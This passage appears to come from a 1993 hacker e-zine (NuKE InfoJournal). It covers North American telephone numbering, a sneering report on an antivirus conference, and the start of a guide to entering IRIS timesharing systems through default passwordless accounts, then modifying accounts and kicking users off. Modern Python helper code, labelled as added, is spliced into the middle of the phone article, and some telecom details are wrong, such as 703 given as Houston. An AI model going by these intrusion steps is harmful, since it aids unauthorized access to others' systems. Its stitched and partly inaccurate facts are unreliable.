In 1961 Bell Telephone announced that it would phase out exchange name dialing city by city. Pittsburgh and Cincinnati began converting in 1962; Philadelphia and Seattle were the last to change, in 1978. The classic combination of two letters and five numbers was a fully national standard for less than a decade. The two-letter-five-number system was also used in Canada, though I'm not sure how widely. Vancouver, British Columbia was one city to use this system, though I don't know how many others did. (Anyone have any information about this?)

All-number calling was introduced for several reasons. Mainly there weren't enough workable letter combinations. Exchanges like 571 had stayed unavailable because letters like JKL (5) and PRS (7) wouldn't combine.
All-number calling also eliminated hard-to-spell exchanges, prevented mix-ups between similar letters and numbers like O and 0, and made possible direct dialing from Europe and other parts of the world, where most phones never had letters on their dials.

For the benefit of those outside of North America, I have included a diagram of how our phone pads are laid out and which letters are assigned to which key:

  ┌───────┬───────┬───────┐
  │   1   │   2   │   3   │
  │       │  ABC  │  DEF  │
  ├───────┼───────┼───────┤
  │   4   │   5   │   6   │
  │  GHI  │  JKL  │  MNO  │
  ├───────┼───────┼───────┤
  │   7   │   8   │   9   │
  │  PRS  │  TUV  │  WXY  │
  ├───────┼───────┼───────┤
  │   *   │   0   │   #   │
  │       │  OPER │       │
  └───────┴───────┴───────┘

(Note: the zero key is marked "OPER" because dialing zero will summon the local operator. Zero and one have no letters officially assigned to them. Some people like to claim that one is "Q" and zero is "Z", but I have never seen one or zero used in that fashion before.)

Each area code has certain exchanges set aside for special purposes. These exchanges are:

555
~~~
Local directory assistance. Dialing NPA-555-XXXX will get you directory assistance for the given area. This is why most phone numbers in movies and TV shows are 555-XXXX or KLondike-5 XXXX... People whose numbers were used in movies, etc. complained to the studios after getting hundreds of calls from losers asking for James Bond or whatever. (One family's phone number appeared on the cover of a heavy metal album, and the family is now suing the band after receiving thousands of threatening phone calls from fans.) This use of 555-XXXX is purely a voluntary thing; a long time ago Bell was able to reserve certain exchanges throughout the country that producers could safely use, but with a shortage of telephone exchanges they had to stop this practice.

950
~~~
Used to access other long-distance services. This is called Feature Group B equal access.
To use the service you call their 950 number (which is a free call), then enter your multi-digit PIN, then dial the number you wish to call. Almost all areas now have Feature Group D service (Equal Access), where you select an alternate carrier and then use it normally, like you used to use AT&T (i.e. just dial 1-NPA-NXX-XXXX). Currently 950s are only used in the U.S., but they are reserved for future use in Canada and will probably soon be utilized, given the recent Unitel decision. Currently Canadian callers must use local dialups for independent long-distance carriers (called Feature Group A, long phased out in the United States). (In the U.K. Mercury uses a similar setup. Mercury phones are equipped to pulse dial 131, enter the customer's ten-digit PIN by touch-tone, then enter the number they're trying to call, all automatically. This is sort of like 950 access...)

958 and 959
~~~~~~~~~~~
These exchanges are usually reserved for plant testing. In some areas they may be used for normal service. In most areas other exchanges are used for testing, too.

976
~~~
976 numbers are like local 1-900 numbers. They are billed on a per-minute basis, but are usually much less expensive than 900 calls (not more than a dollar or two at most per minute). 976 can usually be blocked (like 900 numbers), sometimes for a fee. In some areas the telephone company has other exchanges set aside for 976-type usage; for instance in Pennsylvania the telco has reserved the 556 exchange for this purpose, and in Texas 703 is used. Sometimes these other exchanges must be specifically requested by the customer before they can be dialed (in other words they default to blocked).

844
~~~
The 844 exchange used to be used for time (it was TIme-4 under the old exchange-name system), but the telephone companies figured: why give away this service for free when you can charge $0.50 via a 976 number? Now time is generally found at NPA-976-1616, and the 844 exchange is available for normal usage.
(Interesting note: in the San Francisco Bay area [408, 415, 510, 707], you can get the time by dialing "POPCORN", billed as a local call. In New York and Boston, the number used to be "NERVOUS.")

936
~~~
Like 844, 936 was once used for pre-recorded messages, only 936 was used for weather announcements (it was WEather-6 in the old days). This, like time, has been moved to a 976 service in most places, usually at NPA-976-1212 (and they throw in obnoxious ads to boot!). Now 936 is usually just a normal exchange.

% Phone capacity %
~~~~~~~~~~~~~~~~~~

The original design of telephone numbers was: (NBX) NNX-XXXX. In theory, this gives:

  N   B   X    N   N   X    X    X    X    X
  8 * 2 * 10 * 8 * 8 * 10 * 10 * 10 * 10 * 10 = 1.024 billion numbers

However, as some area codes and exchanges are reserved for special purposes (such as 411, the 555 exchange, etc.), the total possible number of telephone numbers was somewhat less.

As the exchange codes in some area codes were used up, some central offices started using the NXX format, where the middle digit can then be a zero or one; this began in New York and Los Angeles and is now used in almost every area code. Now, telephone numbers look like this: (NBX) NXX-XXXX. This gives a potential of:

  N   B   X    N   X    X    X    X    X    X
  8 * 2 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 1.28 billion numbers

However, codes like 411 and 611 would not be assigned because they will still be needed for services such as directory assistance and repair. Nevertheless, some unused N11 codes like 211 may be found in some area codes as active exchanges. It's also not a good idea to assign the home area code (or nearby area codes) as exchange codes, as this could cause confusion.

Going from NNX exchange codes to NXX only represents a 25% increase in the total theoretical number of telephone numbers, and not all area code regions are expected to run out of exchanges. The ultimate goal is not only to use area codes for exchange codes, but to use exchange codes for area codes also.
This means that telephone numbers will ultimately look like this: (NXX) NXX-XXXX. This gives a potential of:

  N   X    X    N   X    X    X    X    X    X
  8 * 10 * 10 * 8 * 10 * 10 * 10 * 10 * 10 * 10 = 6.4 billion numbers

With a five-fold increase in the number of possible area codes, there should be plenty of room to grow for some time.

% Placing calls %
~~~~~~~~~~~~~~~~~

Basically, all calls within an area code will ultimately be dialed in one of the following ways: 1) dial seven digits; 2) dial one plus the home area code plus the local number; or 3) dial one plus the seven-digit number within the area code, then wait a few seconds for the dialing to time out. One alternative not mentioned in official documents (for touch tone phones) is to dial one plus the seven-digit number in the home area code and then press the pound key, with the pound key terminating the dialing (as in international dialing).

* "1+" is generally used for direct-dialed long distance calls within North America, especially calls outside the local area code. Sometimes intra-LATA calls must be dialed 1-NXX-XXXX or even 1-NPA-NXX-XXXX if they're outside your local calling area. Yep, unlike almost all of the rest of the world, World Zone One uses 1 for DDD calls instead of the internationally-standard 0.

* "0+" is used to dial operator-assisted or automated credit card calls within North America. After 0 + (area code) + number are dialed, a prompt tone (the same tones as a dial tone, but for a very short duration) will be issued, then one of the following actions will be taken: 1) wait for a few seconds, then an operator will come on the line; 2) dial "0" to get the operator immediately (for a collect or person-to-person call, etc.); or 3) dial the telephone company credit card number for billing purposes. It is unclear what will happen in the case of automated collect calls, as to what kinds of dialing would be standard in that case.
In my area, a computer voice system prompts you for your name, then dials the number and says "You have a collect call from [your three-second message]. Press one to accept the charges or two to reject the call" (or something very close to that). Of course, this system is open to abuse: probably the most collect calls are made from a Mr./Ms. "Call me back at NXX-XXXX", etc... Also, this system is only used for local calls.

* Dialing "0" and waiting will get the local area operator.

* "00" is used in the U.S. to get the operator for the default long distance carrier. This is used as most long distance companies have their own operators. A single "0" digit will call up the local operator (with the local telephone company as opposed to the long distance company).

* "01" is used for overseas calls. "01+" indicates an operator-assisted or automatic credit card call, while "011+" indicates a direct-dialed overseas call. "010+" is reserved for some unspecified future use.

* "10XXX+" is used in the U.S. to indicate which long distance carrier to use in a situation known as "equal access." This allows a telephone subscriber to select a long distance company for a particular call. For instance, "10288+" gets AT&T (288 is ATT...), while "10222+" gets MCI and "10333+" selects U.S. Sprint. After this code, a 1 or 0 is dialed (to indicate a direct-dial or operator-assisted call), then the number to be called. With this system you can place a call via another carrier if they offer lower rates, etc. for that particular call. You get a separate bill in a month or two.

    10000          is not available for assignment.
    10001 - 10099  are reserved for restricted purposes.
    10100 - 10199  are reserved for international carriers.
    10200 - 10999  are assigned to standard long distance carriers.

  Canada doesn't have to worry about this code yet, though given the recent changes in long-distance regulation, it's likely that they will adopt a U.S.-style system soon.
* "11+" is reserved for special calling services like call-waiting functions, etc. For instance, "1170" is used to disable call waiting. The asterisk or "star" key ("*") can be used instead of the "11" prefix on touch-tone phones. The current special calling codes on many local telephone systems are:

    *57 - call tracing request (some systems use this for call back)
    *60 - call blocking activated
    *61 - priority ring activated
    *63 - select call forwarding activated
    *66 - repeat dialing activated
    *67 - call number ID blocking (must be dialed before each call)
    *69 - call return activated
    *70 - disable call waiting
    *71 - three-way calling according to usage
    *72 - enable call forwarding
    *73 - disable call forwarding
    *74 - modify speed calling directory entry (for 8 # service)
    *75 - modify speed calling directory entry (for 30 # service)
    *76 - call pickup
    *79 - ring again
    *80 - call blocking disabled
    *81 - priority ring disabled
    *83 - select call forwarding activated
    *86 - repeat dialing disabled
    *89 - call return disabled

% International dialing %
~~~~~~~~~~~~~~~~~~~~~~~~~

International Direct Distance Dialing (011+/01+ dialing) began in 1970 between New York and London, and has since become available in all service areas in North America. Over 99% of the world's telephones are reachable from the United States and Canada. According to AT&T, the only areas which require operator assistance to reach are: Afghanistan, Burma, Cuba, Easter Island, Laos, Niue, Norfolk Island, Somalia, Spanish Sahara, Sudan, Tuvalu, Vanuatu, Wallis and Futuna, and Yemen. From Canada, calls can be direct-dialed to Cuba and Burma (the U.S. government doesn't permit any calls there, even though the capability exists). North Korea cannot be dialed at all, period, even with an operator; not only do they have a primitive phone system and are politically shunned, they also just changed everyone's phone number, so no one can dial in and spread evil Capitalist propaganda.
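The prefix rules in the "Placing calls" section, together with the overseas prefixes above, can be turned into a small classifier for dialed strings. The following is an added example, not code from the original article: the 1+, 0+, 00, 01+/011+/010+, 10XXX+ and 11+/star-code rules, the Carrier Identification Code ranges and the twelve-digit international limit are taken from the text, while the function names, the return format and the sample numbers (constructed, not real subscriber numbers) are my own assumptions.

```python
"""Classify a dialed digit string under the World Zone One rules described in
the "Placing calls" and "International dialing" sections.

Added example, not code from the original article.  The prefix rules, the
Carrier Identification Code ranges and the twelve-digit international limit
come from the text; the function names, the return format and the sample
strings (constructed, not real numbers) are assumptions of this example.
"""
import re

INTL_MAX_DIGITS = 12   # current IDD maximum per the article (fifteen after "Time T")


def is_npa(code):
    """Three digits, first digit 2-9.  The middle digit is not checked, so both
    traditional (N0X/N1X) and interchangeable area codes pass."""
    return bool(re.fullmatch(r"[2-9]\d\d", code))


def is_local_number(number):
    """NXX-XXXX: a seven-digit number whose exchange starts with 2-9."""
    return bool(re.fullmatch(r"[2-9]\d{6}", number))


def cic_class(xxx):
    """Classify the XXX part of a 10XXX Carrier Identification Code."""
    n = int(xxx)
    if n == 0:
        return "not available for assignment"
    if n <= 99:
        return "reserved for restricted purposes"
    if n <= 199:
        return "reserved for international carriers"
    return "standard long distance carrier"


def classify(dialed):
    """Return (kind, details) for a dialed string.

    Spaces, hyphens and parentheses are ignored.  A trailing '#' is the
    touch-tone dialing terminator and is dropped.  '*' is the touch-tone
    form of the '11' prefix for special calling codes."""
    s = re.sub(r"[\s()\-]", "", dialed).rstrip("#")

    # 11XX on rotary or *XX on touch-tone: special calling services (1170 / *70).
    m = re.fullmatch(r"(?:\*|11)(\d\d)", s)
    if m:
        return ("special calling code", {"code": m.group(1)})

    # 10XXX+ equal-access carrier selection, then 1 (direct) or 0 (operator)
    # and the number; the remainder is classified recursively.
    m = re.fullmatch(r"10(\d{3})([01].*)", s)
    if m:
        xxx, rest = m.groups()
        return ("carrier access", {"cic": "10" + xxx,
                                   "cic_class": cic_class(xxx),
                                   "call": classify(rest)})

    # Overseas: 011+ direct, 01+ operator/credit card, 010+ reserved.
    if s.startswith("011") and len(s) > 3:
        number = s[3:]
        return ("international direct",
                {"number": number,
                 "exceeds_pre_time_t_limit": len(number) > INTL_MAX_DIGITS})
    if s.startswith("010"):
        return ("reserved prefix", {"prefix": "010"})
    if s.startswith("01") and len(s) > 2:
        return ("international operator-assisted", {"number": s[2:]})

    # 0 alone reaches the local operator, 00 the long distance carrier's operator.
    if s == "0":
        return ("local operator", {})
    if s == "00":
        return ("long distance carrier operator", {})

    # 0 + NPA + number: operator-assisted or credit card call within North America.
    if s.startswith("0") and len(s) == 11 and is_npa(s[1:4]) and is_local_number(s[4:]):
        return ("operator-assisted", {"npa": s[1:4], "number": s[4:]})

    # 1 + NPA + number: direct distance dialing; 1 + seven digits: toll call
    # inside the home NPA (a dialing time-out or '#' ends it).
    if s.startswith("1") and len(s) == 11 and is_npa(s[1:4]) and is_local_number(s[4:]):
        return ("direct distance dialing", {"npa": s[1:4], "number": s[4:]})
    if s.startswith("1") and len(s) == 8 and is_local_number(s[1:]):
        return ("toll call within home NPA", {"number": s[1:]})

    # Ten-digit dialing (overlay NPAs), a plain local call, or an N11 code.
    if len(s) == 10 and is_npa(s[:3]) and is_local_number(s[3:]):
        return ("ten-digit dialing", {"npa": s[:3], "number": s[3:]})
    if is_local_number(s):
        return ("local call", {"number": s})
    if re.fullmatch(r"[2-9]11", s):
        return ("N11 service code", {"code": s})

    return ("unrecognized", {"digits": s})
```

classify("10288 1 212 555 1212") reports a carrier-access call over 10288 wrapping a direct-distance-dialed call to 212-555-1212, and "1 555 1212 #" comes back as a toll call inside the home area code with the pound key as terminator. The order of the tests matters: the 11/star and 10XXX checks run first because a 1+ or 0+ number can never begin with those digit pairs, since every area code and exchange starts with 2-9.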
(There are no phone books in North Korea -- that's classified information. Seriously.)

As you can see, most of the non-direct-dialable numbers are small Pacific islands; these calls aren't direct-dialable because the only trunks to these countries are generally to Australia or other Pacific countries, and AT&T is only allowed to use the trunks for an hour or two each day. Other countries just have phone systems in such awful condition that they can't be dialed easily (Laos, Sudan, etc.), while Cuba and Burma are banned in the U.S. for political reasons. Within a few years, the capability to direct-dial all telephones in the world should exist. Already IDDD exists to certain research bases in Antarctica, Mongolia, and other places you'd never even *want* to call. It's only a matter of time, now...

% The future of World Zone One %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

On January 1, 1995 all telephone systems are expected to change their equipment over to allow for new "interchangeable" area codes (area codes whose second digits are not one or zero). This date was originally to be July 1, 1995 but was moved up to January because of increasing demand for phone numbers due to fax, modem, and cellular phones. The initial set of new area codes will take the form NN0, or those numbers ending in zero. This means that areas that do not have exchanges ending in zero (or have only a few NN0 exchanges that could be renumbered) will still be able to tell the difference between an exchange and an area code by looking at the first three digits. The new NN0-type area codes will be assigned starting with these first few codes (in order): 260, 480, 520, 590, 650, 220, 250, 490, 660, 680, 720, 730, 850, and 940. The 970 NPA will be reserved for phone testing purposes, and will not become an area code.

New area codes may be assigned as follows: geographic codes will use N2X and N3X, N4X through N7X will be used for expansion, and N8X and N9X will be used for non-geographic codes.
(In this notation N represents a digit from 2 to 9, and X represents any digit.) Thus, area codes like 223, 734, or 520 would be geographic codes under the proposal, while area codes like 987, 294, or 780 would be non-geographic (like 700/800/900 numbers are now). The middle digit of the area code is referred to as the "B" digit, thus the B digit indicates a new geographic or non-geographic code. As the initial sets of geographic and non-geographic codes are used up, expansion takes place by using the nearest available expansion set. Thus, N4X codes are next in line for geographic code expansion, while N7X codes are next for non-geographic expansion. Ultimately, expansion to more digits will be needed in the distant future, and it is proposed that either the N5X or N6X codes can be used to provide "expansion" codes to set up a numbering plan of more than ten digits.

In addition to the new area codes, the Carrier Identification Code format of 10XXX+ will be expanded to 101XXXX+ in the near future, because nearly all of the 10XXX codes are assigned at this time.

On December 31, 1996 (referred to as "Time T"), there will be an expansion of the maximum international number length from twelve digits to fifteen digits, according to a CCITT recommendation. Already one country has moved to fourteen-digit numbers, and more such plans are likely in the future; in order to continue to permit direct dialing to such countries, the maximum number of digits allowed for IDD calls must be increased to at least fifteen.

Also, it has been recommended that the North American phone system evolve to ten-digit dialing for station-to-station (network based) calls, including local calls. The idea is to start in the metropolitan areas using "overlay" NPA codes, like New York, and perhaps other areas soon.
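The digit rules scattered through this article (the keypad letters, the pulse counts that made 212 cheap and 909 expensive on a rotary dial, the N/B/X capacity arithmetic from "Phone capacity", the special exchanges listed under "Assignment of exchanges", and the B-digit rule for interchangeable area codes just described) fit in one small module. This is an added example, not code from the original article; the rules and figures are the article's, while the function names, the "traditional/geographic/expansion/non-geographic" labels and the sample inputs are my own assumptions.

```python
"""Helpers for the North American Numbering Plan as this article describes it.

Added example, not code from the original article.  Keypad letters, rotary
pulse counts, the N/B/X capacity arithmetic, the special exchanges and the
B-digit classification of interchangeable area codes are the article's; the
function names, the class labels and the sample inputs are assumptions of
this example.
"""
import re

# Letters printed on each key of a North American dial (Q and Z have no key;
# 0 and 1 carry no letters).
KEY_LETTERS = {"2": "ABC", "3": "DEF", "4": "GHI", "5": "JKL",
               "6": "MNO", "7": "PRS", "8": "TUV", "9": "WXY"}
LETTER_TO_DIGIT = {c: d for d, cs in KEY_LETTERS.items() for c in cs}


def letters_to_digits(text):
    """Translate an exchange name into the digits actually dialed.

    Follows the 2L+5N convention used in the article: capital letters are
    dialed, lower-case letters only spell out the name ('RAndolph' -> '72',
    'TIme-4' -> '844'), digits pass through, hyphens are dropped."""
    digits = []
    for ch in text:
        if ch.isdigit():
            digits.append(ch)
        elif ch.isupper():
            if ch not in LETTER_TO_DIGIT:
                raise ValueError("no dial key carries %r" % ch)
            digits.append(LETTER_TO_DIGIT[ch])
    return "".join(digits)


def rotary_clicks(number):
    """Pulses a rotary dial sends for a digit string: d pulses for 1-9, ten for 0."""
    return sum(10 if ch == "0" else int(ch) for ch in number if ch.isdigit())


# Digit classes in the article's notation: N = 2-9, B = 0-1, X = 0-9.
DIGIT_CLASS_SIZE = {"N": 8, "B": 2, "X": 10}


def capacity(pattern):
    """Count the numbers a pattern such as 'NBX NNX-XXXX' can represent."""
    total = 1
    for ch in pattern:
        if ch in DIGIT_CLASS_SIZE:
            total *= DIGIT_CLASS_SIZE[ch]
        elif ch not in " -":
            raise ValueError("unexpected character %r in pattern" % ch)
    return total


def npa_kind(npa):
    """Classify an area code by its middle ("B") digit.

    Middle digit 0/1: a traditional N0X/N1X code.  Otherwise an
    interchangeable code, split as the article's proposal has it:
    N2X/N3X geographic, N4X-N7X expansion, N8X/N9X non-geographic."""
    if not re.fullmatch(r"[2-9]\d\d", npa):
        raise ValueError("an area code is three digits starting with 2-9")
    b = npa[1]
    if b in "01":
        return "traditional"
    if b in "23":
        return "geographic"
    if b in "4567":
        return "expansion"
    return "non-geographic"


# Exchanges the article says are set aside in every area code.
SPECIAL_EXCHANGES = {
    "555": "directory assistance",
    "950": "Feature Group B carrier access",
    "958": "plant testing",
    "959": "plant testing",
    "976": "premium per-minute service",
}


def exchange_note(nxx):
    """Explain why an exchange is not a plain subscriber exchange, or None."""
    if not re.fullmatch(r"[2-9]\d\d", nxx):
        return "exchange must be NXX (first digit 2-9)"
    if nxx.endswith("11"):
        return "N11 service code (411 directory assistance, 611 repair, ...)"
    return SPECIAL_EXCHANGES.get(nxx)
```

letters_to_digits follows the article's capitalization convention, so "RAndolph" gives 72 and "WEather-6" gives 936; rotary_clicks("909") is 28 and rotary_clicks("212") is 5, matching the statistics section; capacity("NBX NNX-XXXX") reproduces the 1.024 billion figure; and npa_kind("520") is geographic while npa_kind("780") is non-geographic, as the proposal in the text has it.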
It is also proposed that 1+ be eliminated as a long-distance access prefix; in other words, any call in North America would consist of ten digits, whether local, long distance, or to an 800/900-type service. In effect, everyone will have a ten-digit phone number, instead of a seven-digit phone number and a three-digit area code, as under the current plan.

Who will get the first interchangeable area code? No one knows for certain, but by observing the number of exchanges in each area we can make some educated guesses. Alabama (205) and Arizona (602) both will need new NPAs very soon, as will 206 (western Washington), 703 (Houston area) and [gasp!] 708 (suburban Chicago). One of these five areas will almost certainly get the first code. Some claim it will be 708... An Illinois Bell operator denies this (but remember, this is an IBT operator here, not someone who knows what they're talking about). There is also a rumour that the next split will occur somewhere in Florida, though this seems unlikely as none of Florida's NPAs are running out of numbers and other areas need them much more urgently. Only time will tell.

% Conclusion %
~~~~~~~~~~~~~~

Well folks, I hope this information has been of use to you. The telephone system can be a fascinating thing (and I'm not just talking about phreaking here), and I encourage you to learn more on your own. Also, look for more articles about the world telecommunications network in future NuKE InfoJournals. I'd also like to take the time to give credit where credit is due: some of the information in this article was gleaned from the comp.dcom.telecom newsgroup on the Usenet and the Telecom Digest archives at lcs.mit.edu, with other bits coaxed from IBT and AT&T operators, borrowed from other text files, and written from personal knowledge and outside research. Enjoy, everyone.
Nowhere Man/NuKE

===============================================================================
===============================================================================
Volume 1, Issue 6, May 1993                                 NuKE Info-Journal #6

  NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
    "National Computer Security Association (NCSA)
     Cover Report"
                            By
                     Throbbing Grisle
  E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu

% NCSA San Francisco Conference January 1993 %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yes, that's right, I got in at the National Computer Security Association's Conference pertaining to computer security in general and viruses in particular. Thanks goes out to my University professor for giving me his unwanted complimentary tickets (way to go, Les!). Since I was on semester break, I called my friend C.K. and we were off, to what is affectionately known in the bay area as, "The City." This would not be that big of a deal, except that the list of speakers reads like a who's who of the anti-viral industry.

We started off with a lecture by the Man himself, Mr. John McAfee. What can we say about this guy? Well, we noticed that John is like the Hugh Hefner of the AV (AntiVirus) world. He comes in very well dressed, very confident, and can get away with saying the most inaccurate pieces of crap and the crowd eats it up like it's ice cream! At one point in his lecture, John stated that the Dir II virus "infects the FAT". Huh?!?! Tell the truth, John. You ain't no programmer. When was the last time you typed in "#include "? Bet you never have. But the ironic thing about the whole show is that there are guys there who know way more about viruses, even have better products out on the market, but who aren't nearly as successful. Does that mean there was McAfee bashing going on? Naw...no resentment here! [NOT]

The next lecture C.K. and I went to, after a long and greasy brunch, was David Stang. "David Who?" you might ask?
Well, I never heard of him before either, but he claims to have started the NCSA (wow - what an accomplishment) and then left it (left or kicked out?) but comes back to give lectures (no hard feelings, right?). Well, anyway, he was there to sell his Virus Analysis Machine, which consisted of the same ol' bait files, a little bit of checking (where is the code placed??), and then it runs the file through Sourcer. I would have thought he could have written his own disassembler, one specifically for viruses. We decided that it would not even be worth pirating. You can bet the other programmers in the audience thought the same thing.

Well, we decided to wrap up the day's festivities (before going out into the San Francisco night to party) by attending Alan Solomon's lecture. He is the good doctor from Doctor Solomon's Anti-Virus Tool Kit. This guy is the kind of Brit that would extract a fee from the US and Canada for using the English Language. Tight? You probably couldn't get dental floss through his `arsehole.' He gets up there waving his arm, making snide comments about everybody and everything (with side implications to McAfee; I get the feeling these two would not make good roommates). Then he talks about CARO, being the `Saviour of the world.' CARO, from what I could gather from the conference, is a group of virus researchers that happens to include Alan Solomon and Fridrik Skulason (maker of F-Prot AntiVirus). The way these guys talk about their group, I thought I was listening to a YAM conference! They really think their group has made a Difference and they are the only protectors against viruses that matter. I turned to a very attractive girl who was sitting nearby (must have been from Marketing) and asked, "Is McAfee part of CARO?", to which she rolled her eyes and said, "Are you kidding? They hate each other." With these amazing memories etched in our minds, we wandered out into the harsh city for a night of over-indulgence.
So much so, we couldn't get up the next day until noon (well, we _were_ on semester break!). We made it up for the middle of someone else's lecture (I can't remember who it was - he had an accent and spoke about how to disassemble viruses. Did I learn anything? Did I care?) Okay, we found that boring enough so we went to the exhibit. Did you know people are still working on hardware solutions for viruses? The girl was pretty cute at the booth, so I became overly interested in their shitty product, asking questions like "Gee, so I wouldn't need any updates?" "Oh no, not with our product", she purred. Yeah, right.

Then we went to a panel discussion where the Good Dr. Solomon and three other guys were talking about the teenage personality distortion patterns of the virus writer/hacker. Nothing new here. We're all suicidal virgins, y'know. (Even though many of us are married with kids, and I presume the rest did pass their puberty stage. Come on, where are you getting this info?)

The last seminar was given by Fridrik Skulason. This guy is all the way from Iceland. (Iceland? They have computers up there? Better yet, `When did they learn to type?') If Solomon is the Arch Enemy of McAfee, Skulason would have been McAfee in an anti-matter universe. What the hell does that mean? It means that McAfee is dark, tall and slim. Fridrik is pale, blond and pudgy. McAfee is an effective speaker (Imposing his Reign of Error); Fridrik is quiet. I mean _real_ quiet. C.K. wanted to set the guy on fire just to see if he could let out a loud yell. John McAfee has Charisma! Fridrik has facts and knows what the hell he is talking about. (Big Deal? huh?)

So here is what I could conclude from the conference:

a) AntiVirus is a big business. McAfee still is the heavyweight champ, but there are a lot of contenders out there that want to knock out the chump, er, champ. However, there is a fallout coming, where only the strong will survive. It is not a time or place for a company to start any more; XTREE's recent failure was cited as an example of that.

b) The AntiVirus world is much more `cliquish' than I would have thought. Kind of reminds me of high school. Some people won't talk to others. Amusing.

c) The AntiVirus world is scared. The sheer number of new viruses is increasing exponentially, overtaking some scanners. VCL was mentioned, as well as MPC, as the new trend that threatens the AV developer. A fallout is predicted in this business.

Any last parting shots? You Bet!

David Stang: Have you ever thought of selling real estate?
Fridrik Skulason: Try charging a little more for F-Prot and take a vacation; you need the sun.
John McAfee: Keep making VIRUSHAM, but sock the money away. Your days are numbered.

Throbbing Grisle

================================================================================
================================================================================

  NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
    "Interactive Realtime Information Service (IRIS)
     Guide"
                            By
                          Ned239
  E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu

% IRIS R9.1.3A Introduction %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Hello Everybody,

I would like to know what has happened to the hacking world. Now it's basically dead, at least in most areas I know of. I hope to change that. Anyways, here is some info on a relatively old system called IRIS or Interactive Realtime Information Service. This system was originally meant to run on older systems like the PDP-8 and PDP-11. Due to the versatile nature of IRIS, today a lot more systems run it.

IRIS systems usually can be reached at 1200 7E1 and after pressing either ESCape or Enter a few times, you should see something like this as a greeting:

-=-

Welcome to "IRIS" R9.1.3A timesharing !

ACCOUNT ID ?

-=-

Or sometimes it will say what you have reached under the welcome line.
IRIS is also extremely hacker-friendly as it will let you type account names for as long as you want. Also when you guess an account there are no passwords on them. At first you will not see what you type; to change this type Control-E to turn the echo on. Try CAPSLOCK also.

-=-

DEFAULT ACCOUNTS
----------------
MANAGER    (Good System Access)
NO NAME    (Normal User)
DEMO       (Try the other ones first)
PDP8      /
PDP11    <== All General Accounts
SOFTWARE  \

Hopefully you're in there with one of those accounts. Now, then you will get a # prompt. If you are on with an account of access level 3, then you will be able to use a user maintenance program, by typing either ACCOUNTS or ACCOUNT UTILITY. You should get:

-=-

(0) EXIT TO SYSTEM
(1) ADD NEW ACCOUNT
(2) MODIFY ACCOUNT
(3) DELETE ACCOUNT
(4) INQUIRE ACCOUNT
(5) LIST THE ACCOUNTS

Ah, I wasn't able to create an account, but I did modify several. Basically this is pretty straightforward.

-=-

Ok, after you're done playing with the accounts and exit properly there are a lot of interesting features on this IRIS. On one particular system that I use often you have several utilities such as spreadsheets, word processors and even an ASM program. You can get a list of all the things to do by typing LIBR at the # prompt. For most of the filenames you type, the response will be "NOT A PROCESSOR", since most of the IRIS software was written in business BASIC. Type BASIC LOAD . Here are some of the most interesting programs.

PP or PORT ALL MONITOR will let you see who else is using the system. If for some reason you want to kick off a user, type PPP and then the user name. Also if you want to see your own status type PROT.STAT.

If you need help with something try typing GUIDE and it will give you a short menu of all the help files available. Too bad there usually aren't many.
Another interesting utility to use is BLOCKCOPY. Since I am not completely used to it, I will show you what the guide said:

-=-
INTERACTIVE PROGRAM GUIDES FOR IRIS CONFIGURATION AND SETUP

TOPIC #   FOR INFORMATION ON:
   1      BLOCKCOPY

THESE PROGRAMS CAUSE NO ACTUAL CHANGES TO TAKE PLACE. RATHER THEY DESCRIBE THE
ACTUAL PROCESSORS/COMMANDS YOU SHOULD USE TO MAKE THE CHANGES YOU DESIRE.
'BEFORE' YOU ACTUALLY DO MAKE THE SUGGESTED CHANGES, YOU SHOULD FIRST 'BACKUP
YOUR SYSTEM'. REMEMBER TO BE VERY CAREFUL WHEN WORKING WITH THE DSP PROCESSOR.

ENTER TOPIC # 1

INTRODUCTORY COMMENTS ON USING BLOCKCOPY

PRINT HERE OR $LPT (C/R OR $) :

INTERACTIVE PROGRAM GUIDE ON SETTING UP BLOCKCOPY

INTRODUCTION

BLOCKCOPY IS A STAND-ALONE UTILITY PROGRAM WHICH GIVES GREAT FLEXIBILITY IN
COPYING ANY PART OF ONE DISC TO ANY PART OF ANOTHER, EVEN ONTO A DIFFERENT DISC
CONTROLLER. BLOCKCOPY DOES NOT PROVIDE FAST PERFORMANCE, BUT IT CAN BE VERY
USEFUL IN SPECIAL CASES. EXAMPLES:

1) YOU CAN COPY A SINGLE LOGICAL UNIT FROM ONE PACK TO ANOTHER, WITHOUT
   OVERWRITING OTHER LOGICAL UNITS ALREADY ON THE DESTINATION.
2) IF YOU HAVE BOTH LARGE STORAGE MODULES AND SMALLER CARTRIDGE DRIVES ON THE
   SAME SYSTEM, YOU CAN BACKUP YOUR SYSTEM LOGICAL UNIT 0 FROM STORAGE MODULE
   ONTO A CARTRIDGE PACK WHICH CAN BE SET ASIDE AS A DEDICATED SYSTEM BACKUP.
3) IF YOU HAVE A SPECIAL SWAPPING DISC, IT CAN BE BACKED UP TO AND RESTORED
   FROM OTHER STORAGE MODULES.

PRESS RETURN WHEN READY TO GO ON

LIMITATIONS

NOTE THAT WHILE YOU CAN COPY FROM ONE TYPE OF DISC CONTROLLER TO ANOTHER, THE
RESULT MAY NOT BE INSTALLABLE UNDER IRIS BECAUSE OF SOME DISC ADDRESS
CONSIDERATIONS. ALSO NOTE THAT YOU MAY NOT SPECIFY A DESTINATION WHICH
PHYSICALLY OVERLAPS THE SOURCE ON THE SAME PACK.

SETUP

FIRST, HAVE AT HAND YOUR R9.0 PERIPHERALS HANDBOOK. NOTICE THAT FOR EACH TYPE OF
DISC, THERE IS A DIFFERENT VALUE FOR THE BZUD POINTER. ALSO NOTICE THAT IT GIVES
YOU FORMULAS TO COMPUTE VALUES CALLED PHYU.
FIND THE APPROPRIATE DISC SPECIFICATION SHEET(S) DESCRIBING YOUR SOURCE (WHERE
YOU ARE COPYING BLOCKS FROM) AND YOUR DESTINATION (WHERE YOU ARE COPYING BLOCKS
TO). THE SOURCE AND DESTINATION DO NOT HAVE TO BE THE SAME TYPE OF CONTROLLER.

